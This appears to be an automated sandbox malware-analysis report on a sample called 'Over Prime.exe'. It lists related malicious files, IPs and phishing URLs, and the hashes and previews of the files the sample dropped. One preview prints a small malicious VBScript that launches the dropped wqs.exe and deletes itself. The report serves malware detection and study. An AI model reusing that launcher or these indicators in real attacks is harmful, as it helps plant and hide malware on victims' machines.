	Compliance_2022.lnk	Get hash	malicious	Browse	185.236.76.230
	Payment442022.exe	Get hash	malicious	Browse	185.161.208.129
	67CD381D1702CB66CC450E13B1E8A27A3FF8C6713AF8A.exe	Get hash	malicious	Browse	185.236.78.222
	https://t.co/tbfWblkdF1	Get hash	malicious	Browse	185.161.209.194
	gunzipped.exe	Get hash	malicious	Browse	185.161.208.82
	AD10 Invoice.xlsx	Get hash	malicious	Browse	185.161.208.181
	h6yRXfU4kQ.exe	Get hash	malicious	Browse	185.161.208.181
	FZ4720133.xlsx	Get hash	malicious	Browse	185.161.208.252
	vSAHIIlZ5e.exe	Get hash	malicious	Browse	185.161.208.35
	+9053798666_2119-091312-110.xlsx	Get hash	malicious	Browse	185.161.208.35
	+9053598666_2119-091312-110.xlsx	Get hash	malicious	Browse	185.161.208.35
	+9053598666_1118-081312-109.xlsx	Get hash	malicious	Browse	185.161.208.35
	+9053598666_1118-081312-109.xlsx	Get hash	malicious	Browse	185.161.208.35
	aO13PRosoU.exe	Get hash	malicious	Browse	185.161.208.181

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	WeTransfer Files.HTML	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	jpoc_slide.doc	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	Overdue Invoice.html	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	jpoc.doc	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	https://mahrat.net/sign.html#ZnlyaXJ0YWVramFtaWRzdG9kYXVzdHVyQGxhbmRzYmFua2lubi5pcw==&referrer=nonreferrer	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	archivo_6861.doc.xls	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	5457-75.lnk	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	Novi cjenik u prilogu.exe	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	attachments 3473.xls	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	Untitled 27052022.doc.xls	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	SecuriteInfo.com.W32.AIDetect.malware2.2689.exe	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	7095678345.htm	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	QoIEPSoS7k.exe	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	https://playburg.net/	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	https://chiseled-inky-atlasaurus.glitch.me/secure.html	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	kVcE3rRbly.exe	Get hash	malicious	Browse	142.250.186.110 142.250.185.65
	05-2022-0438.doc	Get hash	malicious	Browse	142.250.186.110 142.250.185.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll	SecuriteInfo.com.W32.AIDetect.malware2.20504.exe	Get hash	malicious	Browse
	OZA202200000030.exe	Get hash	malicious	Browse
	Over Prime.exe	Get hash	malicious	Browse
	OZA202200000030.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe	Get hash	malicious	Browse
	Company Profile.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.7352.17461.exe	Get hash	malicious	Browse
	Enquiry_300522_PDF.exe	Get hash	malicious	Browse
	Company Profile.exe	Get hash	malicious	Browse
	Company Profile.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.7352.17461.exe	Get hash	malicious	Browse
	Enquiry_300522_PDF.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe	Get hash	malicious	Browse
	Enquire_260522_pdf.exe	Get hash	malicious	Browse
	Company Profile.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe	Get hash	malicious	Browse
	270-21PRI Solicitud de Propuesta RBT MFG S.L.pdf(47KB).exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\fossildelta.dll	Over Prime.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wqs.exe_5de7e7b08b3e5c86b8b02a256aa7bac32e252e_2f3aa718_a2a4a9c4-75e6-4d16-9eb5-77cfaf3dc85d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9903125628480254
Encrypted:	false
SSDEEP:	96:nnFUGVyso9LSoI7JfDvXIxcQvc6QcEscw3n+HbHgoC5AJcf3h88WSAMb7OyWmNFw:nCSydmmBUWwj4mCzeDu76pfAIO8xv
MD5:	349DED03C556C23C5A912986632ACBD5
SHA1:	AB14ED145E7D04EEC58F7E25B2A1F5A23C2E54C0
SHA-256:	3EBECE19E64EFBBF4B008A24EFBDBBF5539CFF01F7E73A7F05A51FC22E55C5B8
SHA-512:	7A5FB8898A5962B5C88460A8C8120E88A686BF42D459838A7362BE72C76DF99A831B78AEDB1628D14E8882418BBEA05C4A5EB053B454CFB036A7AA6C58064809
Malicious:	false
Yara Hits:	Rule: SUSP_WER_Suspicious_Crash_Directory, Description: Detects a crashed application executed in a suspicious directory, Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wqs.exe_5de7e7b08b3e5c86b8b02a256aa7bac32e252e_2f3aa718_a2a4a9c4-75e6-4d16-9eb5-77cfaf3dc85d\Report.wer, Author: Florian Roth
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.8.3.9.1.9.1.3.8.1.8.2.1.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.8.3.9.1.9.1.5.0.2.0.9.8.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.a.4.a.9.c.4.-.7.5.e.6.-.4.d.1.6.-.9.e.b.5.-.7.7.c.f.a.f.3.d.c.8.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.9.5.0.f.c.0.-.d.9.2.2.-.4.e.8.6.-.8.3.4.f.-.2.e.b.1.0.f.b.8.a.2.5.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.q.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.8.-.0.0.0.1.-.0.0.1.5.-.b.0.e.8.-.1.8.7.b.2.b.7.4.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.5.b.8.6.0.c.0.2.5.7.8.4.7.3.1.f.c.2.b.6.a.4.1.4.6.f.7.1.b.6.b.0.0.0.0.0.9.0.4.!.0.0.0.0.b.b.5.e.f.9.a.7.1.1.6.0.c.8.c.d.2.0.7.9.1.e.c.1.a.4.b.f.d.c.2.1.c.7.a.3.0.f.0.0.!.w.q.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER90BC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 30 13:45:14 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	70788
Entropy (8bit):	1.983341556799685
Encrypted:	false
SSDEEP:	192:385lLkmpKRLOTh2/Ve3nONqKz/J+D+QsIAU19IoCN8WXakMJToDRwVD47pS10ImN:ypHT8/0S4DGIApMJkwVU7GrfU
MD5:	58224A26BE0C476FC574B184B59A3BB1
SHA1:	4000960EB4D5FB2379E5EDB2D8FB9B02AF5220E4
SHA-256:	0C23A6102C25199C60C02D1268162703A5DB992A2807A80820AAA8101A9E2A35
SHA-512:	235D067060276AAA188C53170D9832B602D277D45F9F72F5C1586C31032DF9779946928C13C5F3EF3B5F9A7F198A99D2D4EFBAEA6A34C8CB02D1019FF90AD69B
Malicious:	false
Preview:	MDMP..a..... .......j.b............T...........`...\............=..........T.......8...........T............(........................... ..............................................................................bJ......@!......GenuineIntel...........T...........f.b.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER92B1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8270
Entropy (8bit):	3.6967999608006967
Encrypted:	false
SSDEEP:	192:R9l7lZNil+6b6Yye6dgmfhCeprI89b4hsf0zIm:R9lnNi86b6YL6dgmfhF4afg
MD5:	1B3629CC8592DC0169374389E440A89C
SHA1:	C2DE639BA2346A76CB6935A4E1C495257F999C70
SHA-256:	68A9D5B45FAF2B1F25EABB3E7526791BB5C47F31D42DF78BA2E81957AFA479FA
SHA-512:	D2CAEDC9B8DF5889B28C67B97C82975D200CDC4E20BCCBCDE01699E3FB508AD3C66F07F5DA371AB4265DBE013EA0D5AE4284AC89B0309DDE2D08B8FB98EF9496
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER934F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4739
Entropy (8bit):	4.507710423916789
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsdQe702I7VFJ5WS2Cfjkms3rm8M4JU2Y+aFh87+q8WWI+8aCl4eL6d:uILff7GySPfsJ5087g8vlpL6d
MD5:	6244DF4426AD49B2407689071DBA3117
SHA1:	524C21CA5AC918865025F14660DCD0440A70FF50
SHA-256:	DC4BE8E410D1DDBA41379DE5F0EC4ED834E0456FFDCE6F0D9FBF609CEEDFA2B8
SHA-512:	B539AA7CF90377C28E3A73749E1A38D24FE0AC2160F3A7984E61B48C3EBE9266D0DAAD6ED7631EC29945541CC8C11074963890822AB7C6E3E93DDFC71BBFA1E1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221637147" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\Users\user\AppData\Local\Temp\Skims.Hos6

Download File

Process:	C:\Users\user\Desktop\Over Prime.exe
File Type:	data
Category:	dropped
Size (bytes):	96243
Entropy (8bit):	6.709228667994296
Encrypted:	false
SSDEEP:	1536:s2GfP3gADUcY3Y+quSguO9/yCjzf8/hfk7r3pvTTS/bYmTq2:sbfzDUhox3JO9/yKykn5vTK0mTq2
MD5:	5A39FD0677DF6A315B5EEF62EB57B20E
SHA1:	DC185462DE2F8A346301B96CCF86113BD3DAF837
SHA-256:	6232298159E27CD286BB1B36607A887FBDABF4FE336C426BC7E280FA60DD12AC
SHA-512:	E302B28326613727C7D12A34B52A375D56ADA99712F47C6DD6C71B22E3351A4142CF42A0D85EBFFEC5797BEDE872F0393BE834C10BC719E4802BD5096BA7B014
Malicious:	false
Preview:	.........f....,..b!............................................f.u....q........./?k.........................f...f......f.f....0..?m.................................................f..........) .&7ppppppppppppppppppppppppppppppppppppp..f.s.H.......... ...b...............................v...f...f...f....6..'__________________________________________________f!.f........f.t..5.}.vJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJf.....f.k........0..Oo[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[.f.....f.......f.k..0RA.I......................................................f....h..,^!.).............................................f.d...f...f.f..4...O..................................................~..........j.......7..\.EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE...........f...f....$7.89))))))))))))))))))))))))))))))))....u....f...f....(A6.'333333333333333333333333333333333333f.......f......2.................................................f!........f.v....".,e///////////////

C:\Users\user\AppData\Local\Temp\estuaries.pro

Download File

Process:	C:\Users\user\Desktop\Over Prime.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	48290
Entropy (8bit):	3.9996145337356794
Encrypted:	false
SSDEEP:	768:VmxTQRKlzmvIJcuJgGOo3gdbng9KXd85JQqLcauZRwwTFtLMjf5LzYpob7Nj:sxTQ/vAQG13gap5JQqViLM7tYpMNj
MD5:	B5C9A62D470B5BB73FF747D7982D4F92
SHA1:	5828ABD6412FB44FB11D76DF65D6E0D8ACF4D4B7
SHA-256:	C7D392B4D4935E38B2810703EFC438B481A8C11F1A8E620037423F57E80617A9
SHA-512:	65652980CDAB722AB70DC21DEC4356B910F5BFB5E46DE4FBC84ED2A41BFC2586AFADB7606003C52B8BA2B7DAF9772B919433299003E389B7BB90AE52DA14A01E
Malicious:	false
Preview:	21E6AE8F90142B154876BE5F5AF235966BD571B9EB8B00A905F3E53B9232DF7AA28B1933D2437BABF22E8AC7BAA93E178C73B345A79F40240CD9A456E50B706027D75A017F424A7E2D6DD863A0089C4322C0C1F33757ACE7FA4049BB7564791DAE0FAF623C64F1C8E41DB2C852090A3AE67C4C27F5C5D885926505EE7958166062289FAC280231E116DB3A883563D856FF6EE5B05BB8BBDE5DE5FF632A91D6B55D502AD7215F76544624BE7B6DE654D98FC7D0A21BCABC2FBE150CEDFF186C440FB104B34BEB489D9275866BE945155717274189EDFC822D91918754FDF40F81B91DEC2733F6464ADD349A681E46A503E8FCCCFC957B2D88721B0A5A0E72903C78B7B0C7BFF902C99CECF439BF08C630B8A47059477B423CCD65A87CDD64CDF463CA2CF7885023779C1E09D4781C70BCBFCCD8CBC5BFD2151CD40120CDA0429C90F74CA4EDF3AB1BBBF051E38CFDB76EE24926468A500FDC44F41D5586572BEAEE4A308A86995D95E2BA664F0625D5568C53BC9AF9BADE9861AB1FCF83CACA22248ED8933B88433FDC1354B8B857E39183C4C5C89725BD19BAACAF713BBB5EFADDC23CE5C9C731DF2428BFA979097E094D5F51A404F2D9DD5E686C4F6B32A29D009E3B3689D6B7A98BDEB803086DD5F21F66735041455FC53E7B2E7E057B60481E6A66F9700D02F9B952475FEDBE90785C6530D5

C:\Users\user\AppData\Local\Temp\fossildelta.dll

Download File

Process:	C:\Users\user\Desktop\Over Prime.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	110044
Entropy (8bit):	5.18588950209503
Encrypted:	false
SSDEEP:	1536:Y73z+LlmJkxpug81hWVM9nVoc29WfHrFu:UAQkmwfofrFu
MD5:	12F5D3D19ADF47448C8469C8B68125FC
SHA1:	9BC5AAFF0385795CBEDE9062FDA3DD75B4C3BC89
SHA-256:	1556B5F0B0363BDC3C9081F5545E9989F24808C979C34D74928C4E3B294518BA
SHA-512:	F83F8929FFD352B0EE987BD48F6BAD39E80A738A2D32BA0EF9E841424105809377B3B475102C1ECE7CEBAAC1A71E9E05A4194B707AD260F715D8A489DA61BDF3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Over Prime.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...qL.`.V........& ...$.0...P......P..........V..........................................`... .........................................[....................`..............................................@R..(....................................................text...8........0..................`.P`.data........@.......6..............@.`..rdata..0....P.......8..............@.`@.pdata.......`.......B..............@.0@.xdata..T....p.......F..............@.0@.bss..................................`..edata..[............J..............@.0@.idata...............L..............@.0..CRT....X............P..............@.@..tls.................R..............@.@..reloc...............T..............@.0B/4...................V..............@.PB/19.....C............Z..............@..B/31..........p......................@..B/45.............. ..................@..B/57.....

C:\Users\user\AppData\Local\Temp\install.vbs

Download File

Process:	C:\Users\user\Desktop\Over Prime.exe
File Type:	data
Category:	modified
Size (bytes):	400
Entropy (8bit):	3.5056525271733245
Encrypted:	false
SSDEEP:	12:4D8o++ugypjBQMBvFQ4lO7MJV4F0M/0aimi:4Dh+S0FNOAL4F0Nait
MD5:	10A5D34E1F10CA1163CDF63A38E3432A
SHA1:	882BD7761515FC1264C6927390029D642098BBE6
SHA-256:	D875BBAAA2BE15F655897FBE0D85D68A8EC2B88A25D3ED4CC79CCDA40E532C17
SHA-512:	1DB318429711D8329CC3EE511306CCF99A7962E9C7B88D0999380EBC4FDCA9BCD5F29D604CF58C898CC4C7C2B13B166B14276FEEFB5BB25CA04897C8AE87054F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.w.q.s...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Over Prime.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.W32.AIDetect.malware2.20504.exe, Detection: malicious, Browse Filename: OZA202200000030.exe, Detection: malicious, Browse Filename: Over Prime.exe, Detection: malicious, Browse Filename: OZA202200000030.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.27496.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe, Detection: malicious, Browse Filename: Company Profile.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.4916.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7352.17461.exe, Detection: malicious, Browse Filename: Enquiry_300522_PDF.exe, Detection: malicious, Browse Filename: Company Profile.exe, Detection: malicious, Browse Filename: Company Profile.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7352.17461.exe, Detection: malicious, Browse Filename: Enquiry_300522_PDF.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe, Detection: malicious, Browse Filename: Enquire_260522_pdf.exe, Detection: malicious, Browse Filename: Company Profile.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.NSIS_Injector.B.genEldorado.21670.exe, Detection: malicious, Browse Filename: 270-21PRI Solicitud de Propuesta RBT MFG S.L.pdf(47KB).exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll

Download File

Process:	C:\Users\user\AppData\Roaming\wqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll

Download File

Process:	C:\Users\user\AppData\Roaming\wqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\printer-network-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\Over Prime.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	162
Entropy (8bit):	5.880326990469703
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllm9pYRmaPhhvy9txi5huoLaVWH1Vi9G1E/PR9/Hb:6v/lhPysUpVaHy9t050WZL1E/PR9/Vp
MD5:	5CD760ADF7A36088A4CE5BE67BE7F852
SHA1:	EB85ED795E3698269B13FCD59CA61DC0745C1153
SHA-256:	12A24D22D7E3AD1FF1B82662782413B1C5E69ED727F447046AFB5C123376797E
SHA-512:	6E3FB1B8A9FDA334E3B87FEA60E4888706AC4BF356B40CA2B9F2FC152BC91051FD0A9C8221AC279DA6EC366FE1FB26480A028753B30F03A38697AF03B478468F
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....YIDAT8.c`........$.D..........K1#....T.U!I`..@...P...$z.c...5..0@.0g...L.........K..{......$@..5.....IEND.B`.

C:\Users\user\AppData\Roaming\logs.dat

Download File

Process:	C:\Users\user\AppData\Roaming\wqs.exe
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	6.640309289591695
Encrypted:	false
SSDEEP:	3:verIxXF7qJCsMCbrkkv4FrCuhMCvfsxCSnCYYDSSnZKSM:vmIrE3MYrkxFrTRvaCA/XSnZs
MD5:	B6DD6844B8B607AD90C7E399A0AF408E
SHA1:	1A48E9FF575430F88C702A67EDAE1535CD73FCA3
